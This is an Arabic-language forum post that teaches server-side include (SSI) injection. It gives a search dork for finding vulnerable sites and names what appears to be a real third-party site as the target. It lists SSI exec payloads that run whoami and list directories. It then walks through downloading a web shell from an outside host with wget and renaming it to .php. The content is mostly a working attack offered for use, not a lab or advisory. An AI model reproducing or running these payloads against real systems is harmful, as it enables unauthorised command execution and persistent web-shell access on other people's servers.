عرض مشاركة واحدة
قديم 10-29-2012, 09:21 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
Injection
:: Interactive Developer ::
 
الصورة الرمزية Injection
 

 

 
إحصائية العضو





Injection غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
Injection is on a distinguished road

افتراضي قنبلة : شرح ثغرات من نوع ssi Injection


السلام عليكم ورحمة الله وبركاتة

كيف الحال ؟

الموضوع محتاج فقط كاسه شاي

دورك بسيط : inurl:bin/Cklb/

ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #

اكواد ممكن ان تستعملها

كود PHP:
<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"--> 
Will show which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux) 
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows) 
Will display all files in the directory 
هذا موقع للتطبيق #

http://dev.stockphotosamerica.com/bin/Cklb

نطبق الكود الثاني في الدخول

كود PHP:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 
نشوف





تمام الحين تاكدنا انه الثغرة موجودة وكل شيء تمام خلونا نجرب نرفع الشل

نفذ التالي

كود PHP:
<!--#exec cmd="wget http://website.com/dir/shell.txt" --> 


خلونا نشوف اذا الملف اذا انرفع ولالا

عن طريق امر

كود PHP:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> 


تمام انرفع بنجاح بس انرفع بصيغة تكست نفذ الامر التالي لنحولة الى بي اتش بي

كود PHP:
<!--#exec cmd="mv shell.txt shell.php" --> 
ونتاكد الان



استعرض



اتمنة وصلت المعلومة لكم كامل الاحترام والتقدير

اخوكم حمد المهندي







rkfgm : avp eyvhj lk k,u ssi Injection

   

رد مع اقتباس